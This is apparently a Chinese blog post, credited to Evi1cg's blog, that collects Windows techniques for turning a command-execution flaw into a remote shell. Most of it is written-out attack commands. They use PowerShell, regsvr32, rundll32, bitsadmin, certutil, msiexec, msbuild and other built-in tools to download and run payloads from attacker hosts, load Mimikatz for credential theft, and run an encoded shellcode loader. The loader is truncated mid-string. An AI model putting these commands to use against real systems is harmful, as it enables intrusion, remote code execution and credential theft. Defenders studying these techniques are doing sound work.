windows命令执行漏洞不会玩？看我！

经常有小伙伴碰到了命令执行漏洞不会玩，比如mssql注入点的命令执行，怎么来获取一个meterpreter？这个时候，就需要想办法来获取了，关于命令行来执行远程命令的方法碰到很多，但是用的时候老会记不起来，所以在这里把碰到的作为一个总结，没准那种方法能帮到你。（当然，我们这里不说可以直接echo webshell的情形）

1、powershell

eg:

powershell IEX (New-Object Net.WebClient).DownloadString

('https://raw.githubusercontent.com/mattifestation/PowerSploit/

master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

2、regsvr32

eg:

regsvr32 /u /s /i:http://site.com/js.pngscrobj.dll

js.png

3、rundll32

eg:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";

document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");

h.Open("GET","http://127.0.0.1:8081/connect",false);trycatch(e)%

4、mshta

eg:

calc.hta

5、pubprn.vbs

eg:

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

6、bitsadmin

eg:

cmd.exe /c bitsadmin /transfer d90f http://site.com/a %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe

7、python（需安装）

eg:

python -c "import urllib2; exec urllib2.urlopen('http://site.com/abc').read();"

abc

import base64; exec base64.b64decode("aW1wb3J0IGN0eXBlcwppbXBvcnQgcGxhdGZvcm0KCihhcmNoLCB0eXBlKSA9IHBsYXRmb3JtLmFyY2hpdGVjdHVyZSgpCgojIDMyLWJpdCBQeXRob24KaWYgYXJjaCA9PSAiMzJiaXQiOgoJc2hlbGxjb2RlID0gIlx4ZmNceGU4XHg4OVx4MDBceDAwXHgwMFx4NjBceDg5XHhlNVx4MzFceGQyXHg2NFx4OGJceDUyXHgzMFx4OGJceDUyXHgwY1x4OGJceDUyXHgxNFx4OGJceDcyXHgyOFx4MGZceGI3XHg0YVx4MjZceDMxXHhmZlx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4YzFceGNmXHgwZFx4MDFceGM3XHhlMlx4ZjBceDUyXHg1N1x4OGJceDUyXHgxMFx4OGJceDQyXHgzY1x4MDFceGQwXHg4Ylx4NDBceDc4XHg4NVx4YzBceDc0XHg0YVx4MDFceGQwXHg1MFx4OGJceDQ4XHgxOFx4OGJceDU4XHgyMFx4MDFceGQzXHhlM1x4M2NceDQ5XHg4Ylx4MzRceDhiXHgwMVx4ZDZceDMxXHhmZlx4MzFceGMwXHhhY1x4YzFceGNmXHgwZFx4MDFceGM3XHgzOFx4ZTBceDc1XHhmNFx4MDNceDdkXHhmOFx4M2JceDdkXHgyNFx4NzVceGUyXHg1OFx4OGJceDU4XHgyNFx4MDFceGQzXHg2Nlx4OGJceDBjXHg0Ylx4OGJceDU4XHgxY1x4MDFceGQzXHg4Ylx4MDRceDhiXHgwMVx4ZDBceDg5XHg0NFx4MjRceDI0XHg1Ylx4NWJceDYxXHg1OVx4NWFceDUxXHhmZlx4ZTBceDU4XHg1Zlx4NWFceDhiXHgxMlx4ZWJceDg2XHg1ZFx4NjhceDZlXHg2NVx4NzRceDAwXHg2OFx4NzdceDY5XHg2ZVx4NjlceDU0XHg2OFx4NGNceDc3XHgyNlx4MDdceGZmXHhkNVx4ZThceDgwXHgwMFx4MDBceDAwXHg0ZFx4NmZceDdhXHg2OVx4NmNceDZjXHg2MVx4MmZceDM1XHgyZVx4MzBceDIwXHgyOFx4NjNceDZmXHg2ZFx4NzBceDYxXHg3NFx4NjlceDYyXHg2Y1x4NjVceDNiXHgyMFx4NGRceDUzXHg0OVx4NDVceDIwXHgzOVx4MmVceDMwXHgzYlx4MjBceDU3XHg2OVx4NmVceDY0XHg2Zlx4NzdceDczXHgyMFx4NGVceDU0XHgyMFx4MzZceDJlXHgzMVx4M2JceDIwXHg1N1x4NGZceDU3XHgzNlx4MzRceDNiXHgyMFx4NTRceDcyXHg2OVx4NjRceDY1XHg2ZVx4NzRceDJmXHgzNVx4MmVceDMwXHgzYlx4MjBceDQyXHg0Zlx4NDlceDQ1XHgzOVx4M2JceDQ1XHg0ZVx4NTVceDUzXHg0ZFx4NTNceDQ1XHgyOVx4MDBceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4NThceDU4XHg1OFx4MDBceDU5XHgzMVx4ZmZceDU3XHg1N1x4NTdceDU3XHg1MVx4NjhceDNhXHg1Nlx4NzlceGE3XHhmZlx4ZDVceGViXHg3OVx4NWJceDMxXHhjOVx4NTFceDUxXHg2YVx4MDNceDUxXHg1MVx4NjhceGI4XHgyMlx4MDBceDAwXHg1M1x4NTBceDY4XHg1N1x4ODlceDlmXHhjNlx4ZmZceGQ1XHhlYlx4NjJceDU5XHgzMVx4ZDJceDUyXHg2OFx4MDBceDAyXHg2MFx4ODRceD

8、certutil

eg:

certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

9、msiexec

msiexec /q /ihttp://site.com/payloads/calc.png

calc.png

msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png

10、msxsl.exe(需下载)

eg:

msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl

demo.xml

exec.xsl

11、IEExec

eg:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off

C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://site.com/files/test64.exe

12、IEXPLORE.EXE

这个需要IE存在可执行命令的漏洞

eg:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://site.com/exp

exp可以使用类似ms14_064

13、当使用UNC/WebDAV时候多的几种姿势

Cmd

cmd.exe /k

Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

dll 可以使用C#写的

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

pcalua.exe

pcalua.exe -a \\server\payload.dll

方式应该还有很多，欢迎留言补充！！

文章出处：Evi1cg's blog

你可能喜欢